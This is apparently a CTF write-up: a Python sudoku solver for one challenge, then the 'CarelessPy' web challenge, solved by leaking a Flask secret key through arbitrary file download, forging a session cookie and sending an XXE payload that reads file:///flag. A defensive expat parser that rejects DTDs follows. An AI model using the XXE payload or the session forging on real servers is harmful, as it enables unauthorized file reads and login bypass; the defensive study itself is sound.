sudoku_easy
I don't know how to use pwntools, so I did it by hand. First, a Python script to solve the sudoku:

# Define the sudoku puzzle
board_str = '''706002008
005076429
009458016
900800105
807190630
300700000
002601900
610230500
400080201'''
board = [[int(ch) for ch in row] for row in board_str.split("\n")]


def print_board(board):
    """
    Print a sudoku puzzle or its solution.
    """
    for i in range(9):
        for j in range(9):
            print(board[i][j], end="")
        print()
    print()


def solve_sudoku(board):
    """
    Solve the sudoku in place by backtracking.
    """
    for i in range(9):
        for j in range(9):
            if board[i][j] == 0:
                for num in range(1, 10):
                    if is_valid(board, i, j, num):
                        board[i][j] = num
                        if solve_sudoku(board):
                            return True
                        else:
                            board[i][j] = 0
                # No digit fits this empty cell: backtrack
                return False
    return True


def is_valid(board, row, col, num):
    """
    Check whether placing num at (row, col) is legal.
    """
    for i in range(9):
        if board[row][i] == num or board[i][col] == num:
            return False
    start_row = (row // 3) * 3
    start_col = (col // 3) * 3
    for i in range(start_row, start_row+3):
        for j in range(start_col, start_col+3):
            if board[i][j] == num:
                return False
    return True


print("数独题目:")
print_board(board)
solve_sudoku(board)
print("数独解答:")
print_board(board)

Just enter the solution as printed. Once the score is high enough, command execution becomes available.
CarelessPy
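Opening the developer tools (F12) shows a hint that there are two routes, /eval and /login. Under the /eval route we can list the file names in a directory, which reveals the file /app/__pycache__/part.cpython-311.pyc. The image download feature has an arbitrary file download flaw; using it to view the file's contents yields the secret_key: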
o2takuXX_donot_like_ntr
Use the secret_key to forge a session and log in:
eyJpc2xvZ2luIjp0cnVlfQ.ZIQfSQ.zgCTwfjszZe_Hf7GafSBjuE0iD8
This route shows only an XML-style error, so I suspected an XXE vulnerability and constructed XML to read the flag:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///flag">]>
<result>
<ctf>&xxe;</ctf><web>&xxe;</web>
</result>
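On the defensive side, the payload above only works because the server's XML parser accepts a DOCTYPE and expands the external entity. The following is an added example, not the challenge's code: it uses the standard-library expat parser to reject any DTD or entity declaration before element content is read. The names parse_result and ForbiddenXML are hypothetical, and it assumes the endpoint only needs the plain text of the children of <result>.

```python
import xml.parsers.expat

# The write-up's payload, copied from the page.
XXE_DOC = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///flag">]>
<result>
<ctf>&xxe;</ctf><web>&xxe;</web>
</result>"""

# Constructed benign input using the same element names.
BENIGN_DOC = """<?xml version="1.0" encoding="utf-8"?>
<result><ctf>alice</ctf><web>42</web></result>"""


class ForbiddenXML(ValueError):
    """Raised when a document carries a DOCTYPE or entity declaration."""


def parse_result(xml_text):
    """Return {tag: text} for the root's children, refusing DTDs and entities."""
    fields, stack, chunks = {}, [], []

    def forbid(*_args):
        raise ForbiddenXML("DOCTYPE and entity declarations are not accepted")

    def start(name, _attrs):
        stack.append(name)
        chunks.clear()

    def end(name):
        if len(stack) == 2:  # direct child of the root element
            fields[name] = "".join(chunks)
        stack.pop()
        chunks.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid    # fires at "<!DOCTYPE"
    parser.EntityDeclHandler = forbid          # fires at "<!ENTITY"
    parser.ExternalEntityRefHandler = forbid   # fires on a SYSTEM entity reference
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text.encode("utf-8"), True)
    return fields
```

Rejecting the DOCTYPE outright is stricter than merely disabling entity expansion, so it also blocks internal-entity expansion tricks; an application that genuinely needs DTDs would require a different policy.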